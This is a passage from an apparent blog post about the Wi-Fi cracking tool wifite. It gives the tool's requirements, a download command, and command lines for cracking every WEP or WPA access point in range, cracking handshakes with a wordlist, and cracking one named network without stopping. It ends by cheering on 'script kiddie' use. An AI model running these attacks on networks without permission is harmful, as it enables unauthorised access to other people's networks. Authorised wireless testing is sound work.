networks at the same time. This tool is customizable to be automated
with only a few arguments.
Requirements:
* Linux operating system.
* Tested working with python 2.4.5 and python 2.5.2.
* Wireless drivers patched for monitor mode and injection.
* aircrack-ng (v1.1) suite.
* xterm, python-tk module: required for GUI.
* macchanger: also available via apt: apt-get install macchanger
* pyrit: not required, optionally strips wpa handshake from .cap files
Execution:
Download the latest version:
wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py
Change permissions to executable:
chmod +x wifite.py
Run:
python wifite.py
or, to see a list of commands with info:
./wifite.py -help
Examples:
The program contains lots of interactivity (waits for user input).
These command-line options are meant to make the program
100% automated.
To crack all WEP access points:
./wifite.py -all -nowpa
To crack all WEP access points with signal strength greater than
(or equal to) 50dB:
./wifite.py -p 50 -nowpa
To attack all access points, use 'darkc0de.lst' for cracking WPA handshakes:
./wifite.py -all --dict /pentest/passwords/wordlists/darkc0de.lst
To attack all WPA access points, but do not try to crack,
any captured handshakes are saved automatically:
./wifite.py -all -nowpa --dict none
To crack all WEP access points greater than 50dB in strength, giving
15 minutes for each WEP attack method, and send packets at 600 packets/sec:
./wifite.py --power 50 -wepw 15 -pps 600
To attempt to crack WEP-encrypted access point "2WIRE752"
endlessly, program will not stop until key is cracked or user
interrrupts with ^C):
./wifite.py -e "2WIRE752" -wepw 0
Be a Script Kiddie Happy!
biOos
No comments:
Post a Comment